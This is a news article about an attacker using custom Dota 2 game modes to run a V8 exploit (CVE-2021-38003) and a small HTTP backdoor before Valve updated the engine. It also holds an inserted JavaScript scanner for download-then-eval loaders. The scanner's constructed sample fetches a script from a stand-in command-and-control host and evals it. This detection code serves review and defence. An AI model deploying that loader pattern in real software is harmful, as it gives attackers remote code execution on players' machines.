In context: Launched in 2013, Dota 2 remains one of the most popular multiplayer experiences among MOBA aficionados. And for 15 months, millions of Dota 2 players were potentially vulnerable to remote code execution attacks because of Valve's carelessness.

Valve is infamous for taking its sweet time making a new Half-Life game (actually, any new game), or for counting up to three. The digital distribution giant co-founded by Gabe Newell is seemingly just as lax when it comes to dangerous security vulnerabilities, putting players of one of its most popular titles at risk and letting hackers go wild with their malicious experiments.

The free-to-play MOBA title Dota 2 is still extremely popular even though it was originally released almost 10 years ago, on July 9, 2013. Like many other games, Dota 2 embeds a build of the V8 JavaScript engine that Google created for the Chrome/Chromium project. The fundamental problem is that, until recently, Valve was still shipping an outdated build of V8 compiled in December 2018.

That more than four-year-old version was riddled with potentially dangerous security bugs. Worse, Dota 2 does not run V8 with any sandbox protection, so a bug in the engine is a bug with the full privileges of the game process. A bad actor could have exploited this to run malicious code remotely on Dota players' machines. According to Avast, that is exactly what happened before Valve finally updated the V8 engine.

Avast researchers discovered that an unknown hacker was testing a potential exploit for CVE-2021-38003, a highly dangerous security flaw in the V8 engine with a severity rating of 8.8/10. At first, the hacker ran a seemingly benign test by publishing a new custom game mode (a way for players to alter the Dota 2 experience) with exploit code for CVE-2021-38003 embedded inside.

After that, the hacker published three more game modes, this time using a more covert approach: a simple backdoor of only "about twenty lines of code." The backdoor could fetch arbitrary JavaScript from a command-and-control server over HTTP and execute it. The clever trick let the attacker keep the actual exploit code off the published game mode and update it at will, without submitting a new custom game mode for review and risking discovery. In other words, the backdoor gave the hacker a way to dynamically execute JavaScript (most likely the CVE-2021-38003 exploit) in the background.
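The "download a script over HTTP, then execute it" loader described above is a recognisable pattern, and a reviewer of custom game mode submissions can flag it without running anything. The following is an added example, not code from the article, from Avast, or from the attacker: a purely lexical scanner that looks for dynamic-code sinks (`eval`, `new Function`, string arguments to `setTimeout`/`setInterval`) alongside network sources in the same script. The `$.AsyncWebRequest` helper name is assumed here to stand for a Panorama-style request API and is included only for illustration; both sample scripts are constructed for this example.

```javascript
// Added example (not from the article): heuristic detection of a
// download-then-eval loader in a custom game mode script.
// The scan is lexical only; it never executes the input.

// Ways of turning a string into running code.
const EVAL_SINKS = [
  { name: "eval", re: /\beval\s*\(/ },
  { name: "new Function", re: /\bnew\s+Function\s*\(/ },
  { name: "Function(string)", re: /\bFunction\s*\(\s*['"`]/ },
  // A string (not a function) passed to a timer is an implicit eval.
  { name: "timer string", re: /\bset(?:Timeout|Interval)\s*\(\s*['"`]/ },
];

// Ways of getting bytes from the network. The $.AsyncWebRequest name is an
// assumption for illustration, standing in for a Panorama-style request helper.
const NETWORK_SOURCES = [
  { name: "fetch", re: /\bfetch\s*\(/ },
  { name: "XMLHttpRequest", re: /\bXMLHttpRequest\b/ },
  { name: "$.AsyncWebRequest", re: /\$\.AsyncWebRequest\s*\(/ },
  { name: "http(s) URL literal", re: /\bhttps?:\/\//i },
];

function findMatches(lines, patterns) {
  const hits = [];
  lines.forEach((text, idx) => {
    for (const p of patterns) {
      if (p.re.test(text)) hits.push({ line: idx + 1, kind: p.name, text: text.trim() });
    }
  });
  return hits;
}

// Returns the sinks and sources found and a verdict: a script is marked
// suspicious only when it contains BOTH a network source and an eval sink,
// which is the loader shape described in the text. A script with only one of
// the two is reported but not flagged, to keep false positives down.
function scanScript(source) {
  const lines = source.split(/\r?\n/);
  const sinks = findMatches(lines, EVAL_SINKS);
  const sources = findMatches(lines, NETWORK_SOURCES);
  return { sinks, sources, suspicious: sinks.length > 0 && sources.length > 0 };
}

// Constructed sample: a loader in the shape the article describes (fetch a
// script from a command-and-control host over HTTP, then eval the body).
const LOADER_SAMPLE = `
var url = "http://c2.example/payload.js";
$.AsyncWebRequest(url, {
  type: "GET",
  success: function (code) {
    eval(code);
  }
});
`;

// Constructed sample: an ordinary game mode tweak with no network or eval.
const BENIGN_SAMPLE = `
function OnHeroSpawned(hero) {
  hero.gold = hero.gold + 500;
  print("bonus gold granted");
}
`;

// Constructed sample: a URL but no sink, so reported yet not flagged.
const URL_ONLY_SAMPLE = `
var wiki = "https://wiki.example/hero-guide";
print("see " + wiki);
`;

function report(name, source) {
  const r = scanScript(source);
  const verdict = r.suspicious ? "SUSPICIOUS" : "ok";
  const detail = [...r.sources, ...r.sinks]
    .map((h) => `  line ${h.line} [${h.kind}]: ${h.text}`)
    .join("\n");
  return `${name}: ${verdict}\n${detail}`;
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(report("loader", LOADER_SAMPLE));
  console.log(report("benign", BENIGN_SAMPLE));
  console.log(report("url-only", URL_ONLY_SAMPLE));
}
```

The heuristic is deliberately coarse: minified code, string-built identifiers (`window["ev" + "al"]`) and non-HTTP channels will slip past it, and a script that legitimately fetches JSON and also uses `new Function` for templating will be flagged. Its value is as a triage filter on submissions, pointing a human reviewer at the handful of scripts worth reading line by line.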

Google patched CVE-2021-38003 in October 2021. The unknown hacker started experimenting in March 2022, and the Dota 2 developers did not fix the issue until January 2023, after Avast informed them of its findings. Further analysis looking for other exploits turned up nothing, and the true motivations of the Dota 2 hacker remain unknown.
